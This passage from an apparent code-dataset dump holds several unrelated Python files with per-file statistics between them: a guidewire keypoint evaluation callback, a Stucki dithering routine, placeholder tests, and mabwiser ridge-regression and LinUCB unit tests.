        if iou_max > 0.5:
            return True
        else:
            return False

    def calculate_result(self):
        """Localize points given GT boxes, one prediction per mask channel.

        Returns:
            true_res: dict image_id -> GT points [num_guidewire, num_point, 2]
            pred_res: list of [image_id, point_class, x, y]  (no score)
        """
        true_res = {}
        pred_res = []
        inference_time = 0
        for i in range(self.inference_num):
            image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
            start = time.time()
            out_masks = self.model.localization([image], [bbox])[0]
            # print(out_masks.shape)
            end = time.time()
            inference_time = inference_time + (end - start)
            for out_mask in out_masks:
                # Channel 0 peak -> point class 0 (1-based x=col+1, y=row+1).
                det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
                pred_res.append([i, 0, det_point[1] + 1, det_point[0] + 1])
                # print([i, 0, det_point[1] + 1, det_point[0] + 1])
                # Channel 1 peak -> point class 1.
                det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
                pred_res.append([i, 1, det_point[1] + 1, det_point[0] + 1])
                # print([i, 1, det_point[1] + 1, det_point[0] + 1])
            true_res[i] = point  # [num_guidewire, num_point, 2]
        print('avg_infer_time:' + str(inference_time / self.inference_num))
        return true_res, pred_res

    def compute_iou(self, box, boxes, box_area, boxes_area):
        """IoU between one (y1, x1, y2, x2) box and an array of boxes."""
        # Calculate intersection areas
        y1 = np.maximum(box[0], boxes[:, 0])
        y2 = np.minimum(box[2], boxes[:, 2])
        x1 = np.maximum(box[1], boxes[:, 1])
        x2 = np.minimum(box[3], boxes[:, 3])
        intersection = np.maximum(x2 - x1, 0) * np.maximum(y2 - y1, 0)
        union = box_area + boxes_area[:] - intersection[:]
        iou = intersection / union
        return iou

    def compute_pck(self, true_res, pred_res, threshold):
        """Fraction of predictions within `threshold` px of some GT point
        of the same class, per class.
        """
        APs = {}
        for cls in range(self.num_classes):
            true_num = 0
            pred_res_cls = [x for x in pred_res if x[1] == cls]
            num_all = len(pred_res_cls)
            if num_all == 0:
                APs[cls] = 0
                continue
            true_res_cls = {}
            for index in true_res:  # index is the image_id
                guidewires = true_res[index]  # [num_guidewire, num_point, 2]
                point_pos = np.array([x[cls] for x in guidewires])  # [num_guidewire, 2]
                true_res_cls[index] = {
                    'point_pos': point_pos,
                }
            for j in pred_res_cls:
                ture_point = true_res_cls[j[0]]
                point1 = j[2:]  # [2]
                PGT = ture_point['point_pos']  # [num_guidewire, 2]
                if len(PGT) > 0:
                    dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
                    dis_min = np.min(dis_square)
                    if dis_min < threshold * threshold:
                        true_num += 1
            print(true_num, num_all)
            APs[cls] = true_num / num_all
        return APs

    def on_epoch_end(self, logs=None):
        """Report per-class PCK at pixel thresholds 3, 5, 7 and 9.

        The last threshold's mean value overwrites logs['mAP'].
        """
        logs = logs or {}
        K.set_learning_phase(0)  # For BN
        true_res, pred_res = self.calculate_result()
        for th in [3, 5, 7, 9]:
            APs = self.compute_pck(true_res, pred_res, th)
            for cls in range(self.num_classes):
                if cls in APs:
                    print(self.class_names[cls] + ' ap: ', APs[cls])
            mAP = np.mean([APs[cls] for cls in APs])
            print('mAP: ', mAP)
            logs['mAP'] = mAP
def read_point(txt_path):
    """Parse a ground-truth annotation file with one guidewire per line.

    Each line holds 8 whitespace-separated integers; per the reordering
    below items 0..3 look like (x1, x2, y1, y2) which are emitted as
    (y1, x1, y2, x2) -- TODO confirm against the writer of these files.
    Items 4..7 are the two endpoint coordinates.

    Returns:
        bbox:  int32 array [num_guidewire, 4]
        point: int32 array [num_guidewire, 2, 2]

    Bug fix: the previous `s[:-1].split(' ')` assumed a trailing newline on
    every line and corrupted (or crashed on) the final field when the last
    line had none; `s.split()` tolerates that and repeated spaces.
    """
    with open(txt_path, 'r') as f:
        lines = f.readlines()
    num_guidewire = len(lines)
    point = np.zeros([num_guidewire, 2, 2], dtype=np.int32)
    bbox = np.zeros([num_guidewire, 4], dtype=np.int32)
    for index, s in enumerate(lines):
        item = [int(v) for v in s.split()]
        bbox[index] = np.array([item[2], item[0], item[3], item[1]])
        point[index, 0] = np.array([item[4], item[5]], dtype=np.int32)
        point[index, 1] = np.array([item[6], item[7]], dtype=np.int32)
    return bbox, point
def make_output(filename, model, output_dir):
    """Run detection on every image in directory `filename` and write
    visualisations to `output_dir` (created if missing).

    For each detection: the box is drawn, and the peak of each of the two
    mask channels is drawn as a circle (channel 0 and channel 1 get
    different colours; colour tuples follow OpenCV's channel order).
    Output files keep the input name with a .png extension.
    """
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    for pic_name in os.listdir(filename):
        image = cv2.imread(os.path.join(filename, pic_name))
        results = model.detect([image])[0]
        out_boxes = results['rois']
        out_scores = results['scores']
        out_masks = results['masks']
        if len(out_boxes) > 0:
            for out_box, out_score, out_mask in zip(
                    out_boxes, out_scores, out_masks):
                image = cv2.rectangle(image, (out_box[1], out_box[0]), (out_box[3], out_box[2]), (255, 0, 0), 2)
                # One circle per mask channel, at the channel's peak
                # (unravel_index gives (row, col); drawn at (col+1, row+1)).
                for channel, colour in ((0, (0, 255, 0)), (1, (0, 0, 255))):
                    det_point = np.unravel_index(out_mask[:, :, channel].argmax(), out_mask[:, :, channel].shape)
                    image = cv2.circle(image, (det_point[1] + 1, det_point[0] + 1), 8, colour, 4)
        cv2.imwrite(os.path.join(output_dir, pic_name[:-4] + '.png'), image)
| 40.790698
| 122
| 0.514645
| 3,727
| 28,064
| 3.676684
| 0.068151
| 0.036269
| 0.017733
| 0.021455
| 0.848427
| 0.833102
| 0.825659
| 0.812012
| 0.802452
| 0.788513
| 0
| 0.030936
| 0.35729
| 28,064
| 687
| 123
| 40.850073
| 0.72878
| 0.082775
| 0
| 0.768439
| 0
| 0
| 0.011115
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053173
| false
| 0
| 0.008576
| 0
| 0.109777
| 0.020583
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91489778266b1738c7040cd08cd5ffc369a0e47a
| 1,192
|
py
|
Python
|
half_tones/half_tones/stucki.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | 1
|
2019-08-23T19:23:18.000Z
|
2019-08-23T19:23:18.000Z
|
half_tones/half_tones/stucki.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | null | null | null |
half_tones/half_tones/stucki.py
|
giovaninppc/MC920
|
7d46238f4079dabc4769c72cbed44d024fcf5c97
|
[
"MIT"
] | 1
|
2020-11-05T23:56:49.000Z
|
2020-11-05T23:56:49.000Z
|
from half_tones.check_range import *
def Stucki(img, error: int, x, y, z):
    """Diffuse quantization error from pixel (x, y), channel z, to its
    neighbours using the Stucki dithering kernel (weights sum to 42):

                .   .   *   8   4
                2   4   8   4   2
                1   2   4   2   1

    Args:
        img:   indexable image, img[x][y][z] is the value being adjusted
        error: quantization error at the current pixel
        x, y, z: current position and channel

    Out-of-bounds neighbours are skipped via checkRange.  The previous
    version spelled out all twelve guard/update pairs by hand; this
    table-driven form applies the identical weights in the same order.
    """
    # (dx, dy, weight) triples of the Stucki kernel, weight is out of 42.
    kernel = (
        (1, 0, 8), (2, 0, 4),
        (-2, 1, 2), (-1, 1, 4), (0, 1, 8), (1, 1, 4), (2, 1, 2),
        (-2, 2, 1), (-1, 2, 2), (0, 2, 4), (1, 2, 2), (2, 2, 1),
    )
    for dx, dy, w in kernel:
        if checkRange(x + dx, y + dy, img):
            img[x + dx][y + dy][z] = img[x + dx][y + dy][z] + (w / 42) * error
| 42.571429
| 60
| 0.468121
| 266
| 1,192
| 2.090226
| 0.078947
| 0.172662
| 0.080935
| 0.375899
| 0.906475
| 0.760791
| 0.757194
| 0.706835
| 0.706835
| 0.706835
| 0
| 0.106195
| 0.241611
| 1,192
| 27
| 61
| 44.148148
| 0.50885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc1689c842711ac8caa62d2bde2fc7a2a958485f
| 140
|
py
|
Python
|
tests/extract/test_transfer_info.py
|
akudan/purr
|
ca6a57217a2cd83fb267d06e8a77657e213f73ce
|
[
"MIT"
] | 4
|
2019-11-14T18:15:42.000Z
|
2022-03-22T22:23:35.000Z
|
tests/extract/test_transfer_info.py
|
akudan/purr
|
ca6a57217a2cd83fb267d06e8a77657e213f73ce
|
[
"MIT"
] | 1
|
2020-01-17T22:33:53.000Z
|
2020-01-29T21:53:51.000Z
|
tests/extract/test_transfer_info.py
|
akudan/purr
|
ca6a57217a2cd83fb267d06e8a77657e213f73ce
|
[
"MIT"
] | 1
|
2021-07-07T19:31:26.000Z
|
2021-07-07T19:31:26.000Z
|
def test_create_stat_table():
    """Placeholder: create_stat_table is not covered yet."""
    pass
def test_get_latest_successful_ts():
    """Placeholder: get_latest_successful_ts is not covered yet."""
    pass
def test_update_latest_successful_ts():
    """Placeholder: update_latest_successful_ts is not covered yet."""
    pass
| 10.769231
| 39
| 0.742857
| 20
| 140
| 4.65
| 0.55
| 0.225806
| 0.236559
| 0.473118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192857
| 140
| 12
| 40
| 11.666667
| 0.823009
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fc31b71922b0abe2403d6c1e41963784601763ad
| 29,338
|
py
|
Python
|
tests/test_ridge.py
|
ncilfone/mabwiser
|
329125d4110312d6001e9486e1cb3490a90565c4
|
[
"Apache-2.0"
] | 31
|
2019-06-14T12:26:44.000Z
|
2020-05-17T19:04:35.000Z
|
tests/test_ridge.py
|
ncilfone/mabwiser
|
329125d4110312d6001e9486e1cb3490a90565c4
|
[
"Apache-2.0"
] | 4
|
2019-12-16T08:41:28.000Z
|
2020-05-27T21:32:11.000Z
|
tests/test_ridge.py
|
ncilfone/mabwiser
|
329125d4110312d6001e9486e1cb3490a90565c4
|
[
"Apache-2.0"
] | 6
|
2019-06-16T13:08:41.000Z
|
2020-04-17T01:57:14.000Z
|
# -*- coding: utf-8 -*-
import math
import numpy as np
from sklearn.preprocessing import StandardScaler
from mabwiser.mab import LearningPolicy
from mabwiser.linear import _RidgeRegression
from tests.test_base import BaseTest
class RidgeRegressionTest(BaseTest):
def test_predict_ridge(self):
    """_RidgeRegression fit/predict on a tiny hand-made context matrix.

    Regression test: pins the unscaled prediction for a fixed context,
    rewards and seed to a known constant.
    """
    context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
    rewards = np.array([3, 3, 1])
    rng = np.random.RandomState(seed=7)
    ridge = _RidgeRegression(rng, l2_lambda=1.0, alpha=1.0, scale=False)
    ridge.init(context.shape[1])
    ridge.fit(context, rewards)
    prediction = ridge.predict(np.array([0, 1, 2, 3, 5]))
    self.assertTrue(math.isclose(prediction, 2.8167701863354, abs_tol=1e-8))
def test_predict_ridge_scaler(self):
    """_RidgeRegression with scale=True pins the scaled prediction.

    NOTE(review): the StandardScaler fitted here is never passed to the
    model -- the ridge is constructed with scale=True and presumably does
    its own scaling internally; the local `scaler` looks dead.  Confirm
    and remove if so.
    """
    context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
    rewards = np.array([3, 3, 1])
    rng = np.random.RandomState(seed=7)
    scaler = StandardScaler()
    scaler.fit(context.astype('float64'))
    ridge = _RidgeRegression(rng, l2_lambda=1.0, alpha=1.0, scale=True)
    ridge.init(context.shape[1])
    ridge.fit(context, rewards)
    prediction = ridge.predict(np.array([0, 1, 2, 3, 5]))
    self.assertTrue(math.isclose(prediction, 1.1429050092142725, abs_tol=1e-8))
def test_fit(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09161491, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.00310559, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.97515528, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.32142857, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], -0.02018634, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1]])
rewards2 = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3])
decisions2 = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions2,
rewards=rewards2,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context2,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09927202, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.17141953, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.09091367, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.03705452, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.59027579, abs_tol=0.00000001))
def test_fit_twice(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09161491, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.00310559, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.97515528, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.32142857, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], -0.02018634, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1],
[0, 2, 9, 5, 1]])
rewards2 = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3, 1])
decisions2 = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0])
mab.fit(decisions2, rewards2, context2)
arms = mab.predict([[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]])
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09927202, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.17141953, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.09091367, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.03705452, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.59027579, abs_tol=0.00000001))
def test_partial_fit(self):
context = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards = np.array([3, 2, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.47619048, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.04761905, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.5952381, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.14285714, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.66666667, abs_tol=0.00000001))
self.assertEqual(mab._imp.arm_to_model[0].beta[0], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[1], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[2], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[3], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[4], 0)
context2 = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards2 = np.array([1, 1, 1])
decisions2 = np.array([0, 0, 1])
mab.partial_fit(decisions2, rewards2, context2)
self.assertEqual(mab._imp.num_features, 5)
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[0], 0.11940299, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[1], 0.01492537, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[2], 0.11940299, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[3], 0.04477612, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[4], 0.17910448, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.53019146, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.13402062, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.56553756, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.17525773, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.61266568, abs_tol=0.00000001))
def test_partial_vs_batch_fit(self):
# Batch fit
context_batch = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2],
[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards_batch = np.array([0, 1, 1, 0, 1, 0])
decisions_batch = np.array([1, 1, 1, 0, 0, 1])
arms_batch, mab_batch = self.predict(arms=[0, 1],
decisions=decisions_batch,
rewards=rewards_batch,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context_batch,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
# Partial fit
context = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards = np.array([0, 1, 1])
decisions = np.array([1, 1, 1])
arms_partial, mab_partial = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
context2 = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards2 = np.array([0, 1, 0])
decisions2 = np.array([0, 0, 1])
mab_partial.partial_fit(decisions2, rewards2, context2)
self.assertListEqual(mab_batch._imp.arm_to_model[0].beta.tolist(),
mab_partial._imp.arm_to_model[0].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].Xty.tolist(), mab_partial._imp.arm_to_model[0].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].A_inv.tolist(),
mab_partial._imp.arm_to_model[0].A_inv.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].beta.tolist(),
mab_partial._imp.arm_to_model[1].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].Xty.tolist(), mab_partial._imp.arm_to_model[1].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].A_inv.tolist(),
mab_partial._imp.arm_to_model[1].A_inv.tolist())
def test_partial_different_order(self):
# Batch fit
context_batch = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2],
[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards_batch = np.array([0, 1, 1, 0, 1, 0])
decisions_batch = np.array([1, 1, 1, 0, 0, 1])
arms_batch, mab_batch = self.predict(arms=[0, 1],
decisions=decisions_batch,
rewards=rewards_batch,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context_batch,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
# Partial fit
context = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards = np.array([0, 1, 0])
decisions = np.array([0, 0, 1])
arms_partial, mab_partial = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
context2 = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards2 = np.array([0, 1, 1])
decisions2 = np.array([1, 1, 1])
mab_partial.partial_fit(decisions2, rewards2, context2)
self.assertListEqual(mab_batch._imp.arm_to_model[0].beta.tolist(),
mab_partial._imp.arm_to_model[0].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].Xty.tolist(), mab_partial._imp.arm_to_model[0].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].A_inv.tolist(),
mab_partial._imp.arm_to_model[0].A_inv.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].beta.tolist(),
mab_partial._imp.arm_to_model[1].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].Xty.tolist(), mab_partial._imp.arm_to_model[1].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].A_inv.tolist(),
mab_partial._imp.arm_to_model[1].A_inv.tolist())
def test_batch_vs_3_partial_fit(self):
# Batch fit
context_batch = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2],
[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1],
[2, 2, 2, 2, 1], [1, 2, 3, 1, 1]])
rewards_batch = np.array([0, 1, 1, 0, 1, 0, 1, 1])
decisions_batch = np.array([1, 1, 1, 0, 0, 1, 0, 0])
arms_batch, mab_batch = self.predict(arms=[0, 1],
decisions=decisions_batch,
rewards=rewards_batch,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context_batch,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
# Partial fit
context = np.array([[2, 2, 2, 2, 1], [1, 2, 3, 1, 1]])
rewards = np.array([1, 1])
decisions = np.array([0, 0])
arms_partial, mab_partial = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
context2 = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards2 = np.array([0, 1, 1])
decisions2 = np.array([1, 1, 1])
context3 = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards3 = np.array([0, 1, 0])
decisions3 = np.array([0, 0, 1])
mab_partial.partial_fit(decisions2, rewards2, context2)
mab_partial.partial_fit(decisions3, rewards3, context3)
self.assertListEqual(mab_batch._imp.arm_to_model[0].beta.tolist(),
mab_partial._imp.arm_to_model[0].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].Xty.tolist(), mab_partial._imp.arm_to_model[0].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].A_inv.tolist(),
mab_partial._imp.arm_to_model[0].A_inv.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].beta.tolist(),
mab_partial._imp.arm_to_model[1].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].Xty.tolist(), mab_partial._imp.arm_to_model[1].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].A_inv.tolist(),
mab_partial._imp.arm_to_model[1].A_inv.tolist())
def test_l2_low(self):
context = np.array([[1, 1, 0, 0, 1], [0, 1, 2, 9, 4], [2, 3, 1, 0, 2]])
rewards = np.array([3, 2, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=0.1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [1, 1])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 1.59499705, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.91856183, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -2.49775977, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.14219195, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 1.65819347, abs_tol=0.00000001))
def test_l2_high(self):
context = np.array([[1, 1, 0, 0, 1], [0, 1, 2, 9, 4], [2, 3, 1, 0, 2]])
rewards = np.array([3, 2, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=10),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.18310155, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.16372811, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.00889076, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.09434416, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.22503229, abs_tol=0.00000001))
def test_l2_0(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1]])
